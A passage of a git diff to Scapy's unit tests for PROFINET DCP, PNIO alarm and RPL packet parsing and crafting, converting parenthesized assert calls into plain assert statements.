b'\xc0\xa8\x01\x0e\xff\xff\xff\x00\xc0\xa8\x01\x0e') # General -assert(p[ProfinetIO].frameID == 0xfeff) -assert(p[ProfinetDCP].service_id == 0x05) -assert(p[ProfinetDCP].service_type == 0x01) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x4e) +assert p[ProfinetIO].frameID == 0xfeff +assert p[ProfinetDCP].service_id == 0x05 +assert p[ProfinetDCP].service_type == 0x01 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x4e # - DCPDeviceOptionsBlock -assert(p[DCPDeviceOptionsBlock].option == 0x02) -assert(p[DCPDeviceOptionsBlock].sub_option == 0x05) -assert(p[DCPDeviceOptionsBlock].dcp_block_length == 0x04) -assert(p[DCPDeviceOptionsBlock].block_info == 0x00) +assert p[DCPDeviceOptionsBlock].option == 0x02 +assert p[DCPDeviceOptionsBlock].sub_option == 0x05 +assert p[DCPDeviceOptionsBlock].dcp_block_length == 0x04 +assert p[DCPDeviceOptionsBlock].block_info == 0x00 # -- DeviceOption -assert(p[DeviceOption].option == 0x02) -assert(p[DeviceOption].sub_option == 0x07) +assert p[DeviceOption].option == 0x02 +assert p[DeviceOption].sub_option == 0x07 # - DCPManufacturerSpecificBlock -assert(p[DCPManufacturerSpecificBlock].option == 0x02) -assert(p[DCPManufacturerSpecificBlock].sub_option == 0x01) -assert(p[DCPManufacturerSpecificBlock].dcp_block_length == 0x09) -assert(p[DCPManufacturerSpecificBlock].block_info == 0x00) -assert(p[DCPManufacturerSpecificBlock].device_vendor_value == b'ET200SP') +assert p[DCPManufacturerSpecificBlock].option == 0x02 +assert p[DCPManufacturerSpecificBlock].sub_option == 0x01 +assert p[DCPManufacturerSpecificBlock].dcp_block_length == 0x09 +assert p[DCPManufacturerSpecificBlock].block_info == 0x00 +assert p[DCPManufacturerSpecificBlock].device_vendor_value == b'ET200SP' # - DCPNameOfStationBlock -assert(p[DCPNameOfStationBlock].option == 0x02) -assert(p[DCPNameOfStationBlock].sub_option == 0x02) -assert(p[DCPNameOfStationBlock].dcp_block_length == 0x08) -assert(p[DCPNameOfStationBlock].block_info == 0x00) -assert(p[DCPNameOfStationBlock].name_of_station == b'device') +assert p[DCPNameOfStationBlock].option == 0x02 +assert p[DCPNameOfStationBlock].sub_option == 0x02 +assert p[DCPNameOfStationBlock].dcp_block_length == 0x08 +assert p[DCPNameOfStationBlock].block_info == 0x00 +assert p[DCPNameOfStationBlock].name_of_station == b'device' # - DCPDeviceIDBlock -assert(p[DCPDeviceIDBlock].option == 0x02) -assert(p[DCPDeviceIDBlock].sub_option == 0x03) -assert(p[DCPDeviceIDBlock].dcp_block_length == 0x06) -assert(p[DCPDeviceIDBlock].block_info == 0x00) -assert(p[DCPDeviceIDBlock].vendor_id == 0x002a) -assert(p[DCPDeviceIDBlock].device_id == 0x0313) +assert p[DCPDeviceIDBlock].option == 0x02 +assert p[DCPDeviceIDBlock].sub_option == 0x03 +assert p[DCPDeviceIDBlock].dcp_block_length == 0x06 +assert p[DCPDeviceIDBlock].block_info == 0x00 +assert p[DCPDeviceIDBlock].vendor_id == 0x002a +assert p[DCPDeviceIDBlock].device_id == 0x0313 # - DCPDeviceRoleBlock -assert(p[DCPDeviceRoleBlock].option == 0x02) -assert(p[DCPDeviceRoleBlock].sub_option == 0x04) -assert(p[DCPDeviceRoleBlock].dcp_block_length == 0x04) -assert(p[DCPDeviceRoleBlock].block_info == 0x00) -assert(p[DCPDeviceRoleBlock].device_role_details == 0x01) +assert p[DCPDeviceRoleBlock].option == 0x02 +assert p[DCPDeviceRoleBlock].sub_option == 0x04 +assert p[DCPDeviceRoleBlock].dcp_block_length == 0x04 +assert p[DCPDeviceRoleBlock].block_info == 0x00 +assert p[DCPDeviceRoleBlock].device_role_details == 0x01 # - DCPDeviceInstanceBlock -assert(p[DCPDeviceInstanceBlock].option == 0x02) -assert(p[DCPDeviceInstanceBlock].sub_option == 0x07) -assert(p[DCPDeviceInstanceBlock].dcp_block_length == 0x04) -assert(p[DCPDeviceInstanceBlock].block_info == 0x00) -assert(p[DCPDeviceInstanceBlock].device_instance_high == 0x00) -assert(p[DCPDeviceInstanceBlock].device_instance_low == 0x01) +assert p[DCPDeviceInstanceBlock].option == 0x02 +assert p[DCPDeviceInstanceBlock].sub_option == 0x07 +assert p[DCPDeviceInstanceBlock].dcp_block_length == 0x04 +assert p[DCPDeviceInstanceBlock].block_info == 0x00 +assert p[DCPDeviceInstanceBlock].device_instance_high == 0x00 +assert p[DCPDeviceInstanceBlock].device_instance_low == 0x01 # - DCPIPBlock -assert(p[DCPIPBlock].option == 0x01) -assert(p[DCPIPBlock].sub_option == 0x02) -assert(p[DCPIPBlock].dcp_block_length == 0x0e) -assert(p[DCPIPBlock].block_info == 0x01) -assert(p[DCPIPBlock].ip == "192.168.1.14") -assert(p[DCPIPBlock].netmask == "255.255.255.0") -assert(p[DCPIPBlock].gateway == "192.168.1.14") +assert p[DCPIPBlock].option == 0x01 +assert p[DCPIPBlock].sub_option == 0x02 +assert p[DCPIPBlock].dcp_block_length == 0x0e +assert p[DCPIPBlock].block_info == 0x01 +assert p[DCPIPBlock].ip == "192.168.1.14" +assert p[DCPIPBlock].netmask == "255.255.255.0" +assert p[DCPIPBlock].gateway == "192.168.1.14" = DCP Identify Response parsing with new DCP packages (DCPOEMIDBlock, DCPDeviceInitiativeBlock) @@ -143,46 +143,46 @@ p = Ether(b'\x01\x0e\xcf\x00\x00\x00\x01\x23\x45\x67\x89\xab\x88\x92' \ b'\x04\x00\x00\x00\x01\x02\x08\x00\x06\x00\x00\x01\x1e\xff\xff') # - General -assert(p[Ether].dst == '01:0e:cf:00:00:00') -assert(p[Ether].src == '01:23:45:67:89:ab') -assert(p[Ether].type == 0x8892) -assert(p[ProfinetIO].frameID == 0xFEFF) -assert(p[ProfinetDCP].service_id == 0x05) -assert(p[ProfinetDCP].service_type == 0x01) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 122) -assert(list(map(lambda x: type(x), p[ProfinetDCP].dcp_blocks)) == [DCPNameOfStationBlock, DCPIPBlock, DCPDeviceIDBlock, DCPDeviceOptionsBlock, DCPDeviceRoleBlock, DCPDeviceInitiativeBlock, DCPManufacturerSpecificBlock, DCPDeviceInstanceBlock, DCPOEMIDBlock]) +assert p[Ether].dst == '01:0e:cf:00:00:00' +assert p[Ether].src == '01:23:45:67:89:ab' +assert p[Ether].type == 0x8892 +assert p[ProfinetIO].frameID == 0xFEFF +assert p[ProfinetDCP].service_id == 0x05 +assert p[ProfinetDCP].service_type == 0x01 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 122 +assert list(map(lambda x: type(x), p[ProfinetDCP].dcp_blocks)) == [DCPNameOfStationBlock, DCPIPBlock, DCPDeviceIDBlock, DCPDeviceOptionsBlock, DCPDeviceRoleBlock, DCPDeviceInitiativeBlock, DCPManufacturerSpecificBlock, DCPDeviceInstanceBlock, DCPOEMIDBlock] # - DCPNameOfStationBlock -assert(p[DCPNameOfStationBlock].option == 0x02) -assert(p[DCPNameOfStationBlock].sub_option == 0x02) +assert p[DCPNameOfStationBlock].option == 0x02 +assert p[DCPNameOfStationBlock].sub_option == 0x02 # - DCPIPBlock -assert(p[DCPIPBlock].option == 0x01) -assert(p[DCPIPBlock].sub_option == 0x02) -assert(p[DCPIPBlock].dcp_block_length == 0x0E) -assert(p[DCPIPBlock].ip == '192.168.1.11') -assert(p[DCPIPBlock].netmask == '255.255.255.0') -assert(p[DCPIPBlock].gateway == '0.0.0.0') +assert p[DCPIPBlock].option == 0x01 +assert p[DCPIPBlock].sub_option == 0x02 +assert p[DCPIPBlock].dcp_block_length == 0x0E +assert p[DCPIPBlock].ip == '192.168.1.11' +assert p[DCPIPBlock].netmask == '255.255.255.0' +assert p[DCPIPBlock].gateway == '0.0.0.0' # - DCPDeviceInitiativeBlock -assert(p[DCPDeviceInitiativeBlock].option == 0x06) -assert(p[DCPDeviceInitiativeBlock].sub_option == 0x01) -assert(p[DCPDeviceInitiativeBlock].dcp_block_length == 0x04) -assert(p[DCPDeviceInitiativeBlock].device_initiative == 0x0000) +assert p[DCPDeviceInitiativeBlock].option == 0x06 +assert p[DCPDeviceInitiativeBlock].sub_option == 0x01 +assert p[DCPDeviceInitiativeBlock].dcp_block_length == 0x04 +assert p[DCPDeviceInitiativeBlock].device_initiative == 0x0000 # - DCPManufacturerSpecificBlock -assert(p[DCPManufacturerSpecificBlock].option == 0x02) -assert(p[DCPManufacturerSpecificBlock].sub_option == 0x01) -assert(p[DCPManufacturerSpecificBlock].device_vendor_value == b'1234 DDD 3XX2-121-0FDD') +assert p[DCPManufacturerSpecificBlock].option == 0x02 +assert p[DCPManufacturerSpecificBlock].sub_option == 0x01 +assert p[DCPManufacturerSpecificBlock].device_vendor_value == b'1234 DDD 3XX2-121-0FDD' # - DCPOEMIDBlock -assert(p[DCPOEMIDBlock].option == 0x02) -assert(p[DCPOEMIDBlock].sub_option == 0x08) -assert(p[DCPOEMIDBlock].dcp_block_length == 0x06) -assert(p[DCPOEMIDBlock].vendor_id == 0x011e) -assert(p[DCPOEMIDBlock].device_id == 0xffff) +assert p[DCPOEMIDBlock].option == 0x02 +assert p[DCPOEMIDBlock].sub_option == 0x08 +assert p[DCPOEMIDBlock].dcp_block_length == 0x06 +assert p[DCPOEMIDBlock].vendor_id == 0x011e +assert p[DCPOEMIDBlock].device_id == 0xffff = DCP Set Request parsing @@ -191,19 +191,19 @@ p = Ether(b'\x94\x65\x9c\x51\x90\x7d\xac\x64\x17\x21\x35\xcf\x81\x00\x00\x00' \ b'\x00\x03\x02\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \ b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert(p[ProfinetIO].frameID == 0xfefd) -assert(p[ProfinetDCP].service_id == 0x04) -assert(p[ProfinetDCP].service_type == 0x01) -assert(p[ProfinetDCP].xid == 0x0000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x08) +assert p[ProfinetIO].frameID == 0xfefd +assert p[ProfinetDCP].service_id == 0x04 +assert p[ProfinetDCP].service_type == 0x01 +assert p[ProfinetDCP].xid == 0x0000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x08 -assert(p[DCPControlBlock].option == 0x05) -assert(p[DCPControlBlock].sub_option == 0x04) -assert(p[DCPControlBlock].dcp_block_length == 0x03) -assert(p[DCPControlBlock].response == 0x02) -assert(p[DCPControlBlock].response_sub_option == 0x02) -assert(p[DCPControlBlock].block_error == 0x00) +assert p[DCPControlBlock].option == 0x05 +assert p[DCPControlBlock].sub_option == 0x04 +assert p[DCPControlBlock].dcp_block_length == 0x03 +assert p[DCPControlBlock].response == 0x02 +assert p[DCPControlBlock].response_sub_option == 0x02 +assert p[DCPControlBlock].block_error == 0x00 = DCP Set Full IP Suite Request parsing @@ -214,21 +214,21 @@ p = Ether(b'\x12\x34\x00\x78\x90\xab\xc8\x5b\x76\xe6\x89\xdf' \ b'\xff\xff\xff\x00\xc0\xa8\x01\x01\x01\x02\x03\x04' \ b'\x05\x06\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') -assert(p[ProfinetIO].frameID == 0xfefd) -assert(p[ProfinetDCP].service_id == 0x04) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x0000004) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 40) -assert(p[ProfinetDCP].option == 0x01) -assert(p[ProfinetDCP].sub_option == 0x03) -assert(p[ProfinetDCP].ip == "192.168.1.171") -assert(p[ProfinetDCP].netmask == "255.255.255.0") -assert(p[ProfinetDCP].gateway == "192.168.1.1") -assert(p[ProfinetDCP].dnsaddr[0] == "1.2.3.4") -assert(p[ProfinetDCP].dnsaddr[1] == "5.6.7.8") -assert(p[ProfinetDCP].dnsaddr[2] == "0.0.0.0") -assert(p[ProfinetDCP].dnsaddr[3] == "0.0.0.0") +assert p[ProfinetIO].frameID == 0xfefd +assert p[ProfinetDCP].service_id == 0x04 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x0000004 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 40 +assert p[ProfinetDCP].option == 0x01 +assert p[ProfinetDCP].sub_option == 0x03 +assert p[ProfinetDCP].ip == "192.168.1.171" +assert p[ProfinetDCP].netmask == "255.255.255.0" +assert p[ProfinetDCP].gateway == "192.168.1.1" +assert p[ProfinetDCP].dnsaddr[0] == "1.2.3.4" +assert p[ProfinetDCP].dnsaddr[1] == "5.6.7.8" +assert p[ProfinetDCP].dnsaddr[2] == "0.0.0.0" +assert p[ProfinetDCP].dnsaddr[3] == "0.0.0.0" = DCP Identify All Request crafting @@ -236,67 +236,67 @@ assert(p[ProfinetDCP].dnsaddr[3] == "0.0.0.0") # dcp_data_length cannot be calculated automatically at this time p = ProfinetIO(frameID=DCP_IDENTIFY_REQUEST_FRAME_ID) / ProfinetDCP(service_id=DCP_SERVICE_ID_IDENTIFY, service_type=DCP_REQUEST, option=255, sub_option=255, dcp_data_length=4) -assert(p[ProfinetIO].frameID == 0xfefe) -assert(p[ProfinetDCP].service_id == 0x05) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x04) -assert(p[ProfinetDCP].option == 0xff) -assert(p[ProfinetDCP].sub_option == 0xff) -assert(p[ProfinetDCP].dcp_block_length == 0x00) +assert p[ProfinetIO].frameID == 0xfefe +assert p[ProfinetDCP].service_id == 0x05 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x04 +assert p[ProfinetDCP].option == 0xff +assert p[ProfinetDCP].sub_option == 0xff +assert p[ProfinetDCP].dcp_block_length == 0x00 = DCP Set Name Request with specified name crafting p = ProfinetIO(frameID=DCP_GET_SET_FRAME_ID) / ProfinetDCP ( service_id=DCP_SERVICE_ID_SET, service_type=DCP_REQUEST, option=2, sub_option=2, name_of_station="device", dcp_block_length=8, dcp_data_length=12) -assert(p[ProfinetIO].frameID == 0xfefd) -assert(p[ProfinetDCP].service_id == 0x04) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x0c) -assert(p[ProfinetDCP].option == 0x02) -assert(p[ProfinetDCP].sub_option == 0x02) -assert(p[ProfinetDCP].dcp_block_length == 0x08) -assert(p[ProfinetDCP].block_qualifier == 0x0001) +assert p[ProfinetIO].frameID == 0xfefd +assert p[ProfinetDCP].service_id == 0x04 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x0c +assert p[ProfinetDCP].option == 0x02 +assert p[ProfinetDCP].sub_option == 0x02 +assert p[ProfinetDCP].dcp_block_length == 0x08 +assert p[ProfinetDCP].block_qualifier == 0x0001 = DCP Identify Response crafting p = ProfinetIO(frameID=DCP_IDENTIFY_RESPONSE_FRAME_ID) / ProfinetDCP(service_id=DCP_SERVICE_ID_IDENTIFY, service_type=DCP_RESPONSE, dcp_data_length=12) / DCPNameOfStationBlock(name_of_station="device", dcp_block_length=8) -assert(p[ProfinetIO].frameID == 0xfeff) -assert(p[ProfinetDCP].service_id == 0x05) -assert(p[ProfinetDCP].service_type == 0x01) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 0x0c) -assert(p[DCPNameOfStationBlock].option == 0x02) -assert(p[DCPNameOfStationBlock].sub_option == 0x02) -assert(p[DCPNameOfStationBlock].dcp_block_length == 0x08) -assert(p[DCPNameOfStationBlock].block_info == 0x00) -assert(p[DCPNameOfStationBlock].name_of_station == b'device') +assert p[ProfinetIO].frameID == 0xfeff +assert p[ProfinetDCP].service_id == 0x05 +assert p[ProfinetDCP].service_type == 0x01 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 0x0c +assert p[DCPNameOfStationBlock].option == 0x02 +assert p[DCPNameOfStationBlock].sub_option == 0x02 +assert p[DCPNameOfStationBlock].dcp_block_length == 0x08 +assert p[DCPNameOfStationBlock].block_info == 0x00 +assert p[DCPNameOfStationBlock].name_of_station == b'device' = DCP Set Full IP Suite Request crafting p = ProfinetIO(frameID=DCP_GET_SET_FRAME_ID) / ProfinetDCP(service_id=DCP_SERVICE_ID_SET, service_type=DCP_REQUEST, option=1, sub_option=3, ip='192.168.1.171', netmask='255.255.255.0', gateway='192.168.1.1', dnsaddr=['1.2.3.4', '5.6.7.8'], dcp_data_length=40, dcp_block_length=30) -assert(p[ProfinetIO].frameID == 0xfefd) -assert(p[ProfinetDCP].service_id == 0x04) -assert(p[ProfinetDCP].service_type == 0x00) -assert(p[ProfinetDCP].xid == 0x1000001) -assert(p[ProfinetDCP].reserved == 0x00) -assert(p[ProfinetDCP].dcp_data_length == 40) -assert(p[ProfinetDCP].option == 0x01) -assert(p[ProfinetDCP].sub_option == 0x03) -assert(p[ProfinetDCP].ip == "192.168.1.171") -assert(p[ProfinetDCP].netmask == "255.255.255.0") -assert(p[ProfinetDCP].gateway == "192.168.1.1") -assert(p[ProfinetDCP].dnsaddr[0] == "1.2.3.4") -assert(p[ProfinetDCP].dnsaddr[1] == "5.6.7.8") +assert p[ProfinetIO].frameID == 0xfefd +assert p[ProfinetDCP].service_id == 0x04 +assert p[ProfinetDCP].service_type == 0x00 +assert p[ProfinetDCP].xid == 0x1000001 +assert p[ProfinetDCP].reserved == 0x00 +assert p[ProfinetDCP].dcp_data_length == 40 +assert p[ProfinetDCP].option == 0x01 +assert p[ProfinetDCP].sub_option == 0x03 +assert p[ProfinetDCP].ip == "192.168.1.171" +assert p[ProfinetDCP].netmask == "255.255.255.0" +assert p[ProfinetDCP].gateway == "192.168.1.1" +assert p[ProfinetDCP].dnsaddr[0] == "1.2.3.4" +assert p[ProfinetDCP].dnsaddr[1] == "5.6.7.8" conf.debug_dissector = old_conf_dissector diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 5921337bc01..c0e09012fda 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -10,7 +10,7 @@ from scapy.libs.six import itervalues = Check that we have UUIDs for v in itervalues(RPC_INTERFACE_UUID): - assert(isinstance(v, UUID)) + assert isinstance(v, UUID) + Check Block @@ -787,13 +787,13 @@ p = Ether(b'\x00\x11\x22\x33\x44\x55' \ b'\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00' \ b'\x81\x00\x0f\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02' \ b'\x80\x02\x00\x0f\x2c\x00\x00\x05\x80\x00\x00\x00\x00\x22') -assert(p[ProfinetIO].frameID == 0xfe01) -assert(isinstance(p[ProfinetIO].payload, Alarm_Low)) -assert(p[AlarmNotification_Low].block_type == 0x0002) -assert(isinstance(p[AlarmNotification_Low].AlarmPayload[0], MaintenanceItem)) -assert(p[MaintenanceItem].UserStructureIdentifier == 0x8100) -assert(isinstance(p[AlarmNotification_Low].AlarmPayload[1], DiagnosisItem)) -assert(p[DiagnosisItem].UserStructureIdentifier == 0x8002) +assert p[ProfinetIO].frameID == 0xfe01 +assert isinstance(p[ProfinetIO].payload, Alarm_Low) +assert p[AlarmNotification_Low].block_type == 0x0002 +assert isinstance(p[AlarmNotification_Low].AlarmPayload[0], MaintenanceItem) +assert p[MaintenanceItem].UserStructureIdentifier == 0x8100 +assert isinstance(p[AlarmNotification_Low].AlarmPayload[1], DiagnosisItem) +assert p[DiagnosisItem].UserStructureIdentifier == 0x8002 = PNIO Alarm decoding (Alarm_High) p = Ether(b'\x00\x11\x22\x33\x44\x55' \ @@ -806,35 +806,35 @@ p = Ether(b'\x00\x11\x22\x33\x44\x55' \ b'\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x08\x00' \ b'\x81\x00\x0f\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x02' \ b'\x80\x02\x00\x0f\x2c\x00\x00\x05\x80\x00\x00\x00\x00\x22') -assert(p[ProfinetIO].frameID == 0xfc01) -assert(isinstance(p[ProfinetIO].payload, Alarm_High)) -assert(p[AlarmNotification_High].block_type == 0x0002) -assert(isinstance(p[AlarmNotification_High].AlarmPayload[0], MaintenanceItem)) -assert(p[MaintenanceItem].UserStructureIdentifier == 0x8100) -assert(isinstance(p[AlarmNotification_High].AlarmPayload[1], DiagnosisItem)) -assert(p[DiagnosisItem].UserStructureIdentifier == 0x8002) +assert p[ProfinetIO].frameID == 0xfc01 +assert isinstance(p[ProfinetIO].payload, Alarm_High) +assert p[AlarmNotification_High].block_type == 0x0002 +assert isinstance(p[AlarmNotification_High].AlarmPayload[0], MaintenanceItem) +assert p[MaintenanceItem].UserStructureIdentifier == 0x8100 +assert isinstance(p[AlarmNotification_High].AlarmPayload[1], DiagnosisItem) +assert p[DiagnosisItem].UserStructureIdentifier == 0x8002 = PNIO Alarm DiagnosisItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), DiagnosisItem()]) -assert(raw(p) == bytearray.fromhex('0002002c0100000000000000000000000000000000000000000000000000000001000000000000000000000000000000')) +assert raw(p) == bytearray.fromhex('0002002c0100000000000000000000000000000000000000000000000000000001000000000000000000000000000000') = PNIO Alarm UploadRetrievalItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), UploadRetrievalItem()]) -assert(raw(p) == bytearray.fromhex('00020036010000000000000000000000000000000000000000000000000000000100000000000000000000000000010000000000000000000000')) +assert raw(p) == bytearray.fromhex('00020036010000000000000000000000000000000000000000000000000000000100000000000000000000000000010000000000000000000000') = PNIO Alarm iParameterItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), iParameterItem()]) -assert(raw(p) == bytearray.fromhex('0002003e0100000000000000000000000000000000000000000000000000000001000000000000000000000000000100000000000000000000000000000000000000')) +assert raw(p) == bytearray.fromhex('0002003e0100000000000000000000000000000000000000000000000000000001000000000000000000000000000100000000000000000000000000000000000000') = PNIO Alarm RS_AlarmItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), RS_AlarmItem()]) -assert(raw(p) == bytearray.fromhex('0002002801000000000000000000000000000000000000000000000000000000010000000000000000000000')) +assert raw(p) == bytearray.fromhex('0002002801000000000000000000000000000000000000000000000000000000010000000000000000000000') = PNIO Alarm PRAL_AlarmItem p = AlarmNotification_Low(AlarmPayload=[MaintenanceItem(), PRAL_AlarmItem()]) -assert(raw(p) == bytearray.fromhex('0002002e01000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000')) +assert raw(p) == bytearray.fromhex('0002002e01000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000') = PNIO PDPortDataAdjust Decoding raw = bytearray.fromhex('0402280000000000dea000006c9711d182710001000305f9dea000016' \ @@ -846,6 +846,6 @@ raw = bytearray.fromhex('0402280000000000dea000006c9711d182710001000305f9dea0000 '00000080020224000c010000000000000100000000021b00080100000' \ '000010000') p = DceRpc4(raw) -assert(p[PDPortDataAdjust].subslotNumber == 0x8002) -assert(p[AdjustPeerToPeerBoundary].peerToPeerBoundary == 0x1) -assert(LINKSTATE_LINK[p[AdjustLinkState].LinkState] == 'Up') +assert p[PDPortDataAdjust].subslotNumber == 0x8002 +assert p[AdjustPeerToPeerBoundary].peerToPeerBoundary == 0x1 +assert LINKSTATE_LINK[p[AdjustLinkState].LinkState] == 'Up' diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index 757a0df306f..e2d678dfdf8 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -7,110 +7,108 @@ load_contrib("rpl_metrics") + Test RPL Control Messages = RPL Base Objects construction -assert(raw(ICMPv6RPL()/RPLDIS()) == b'\x9b\x00\x00\x00\x00\x00') -assert(raw(ICMPv6RPL()/RPLDIO()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') -assert(raw(ICMPv6RPL()/RPLDAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01') -assert(raw(ICMPv6RPL()/RPLDAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00') -assert(raw(ICMPv6RPL()/RPLDCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01') -assert(raw(ICMPv6RPL()/RPLDCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00') +assert raw(ICMPv6RPL()/RPLDIS()) == b'\x9b\x00\x00\x00\x00\x00' +assert raw(ICMPv6RPL()/RPLDIO()) == b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +assert raw(ICMPv6RPL()/RPLDAO()) == b'\x9b\x02\x00\x00\x32\x00\x00\x01' +assert raw(ICMPv6RPL()/RPLDAOACK()) == b'\x9b\x03\x00\x00\x32\x00\x01\x00' +assert raw(ICMPv6RPL()/RPLDCO()) == b'\x9b\x07\x00\x00\x32\x00\x00\x01' +assert raw(ICMPv6RPL()/RPLDCOACK()) == b'\x9b\x08\x00\x00\x32\x00\x01\x00' p=raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDCOACK()/RPLOptPadN(optdata='0'*10)) -assert(p == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\x42\x0f\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30') +assert p == b'\x60\x00\x00\x00\x00\x14\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x08\x42\x0f\x32\x00\x01\x00\x01\x0a\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDCO()/RPLOptTgt(prefix="fd00::1", plen=128)) -assert(p == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\x32\x6e\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\x32\x6e\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO()/RPLOptRIO(plen=64, prefix="fd00::1")) -assert(p == b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x6b\xe6\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x16\x40\x00\xff\xff\xff\xff\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') +assert p == b'\x60\x00\x00\x00\x00\x34\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\x6b\xe6\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x03\x16\x40\x00\xff\xff\xff\xff\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' p = raw(IPv6(src="fe80::1")/ICMPv6RPL()/RPLDIO(dodagid="aaaa::1")/RPLOptDODAGConfig()/RPLOptDAGMC()/RPLDAGMCLinkETX()) -assert(p == 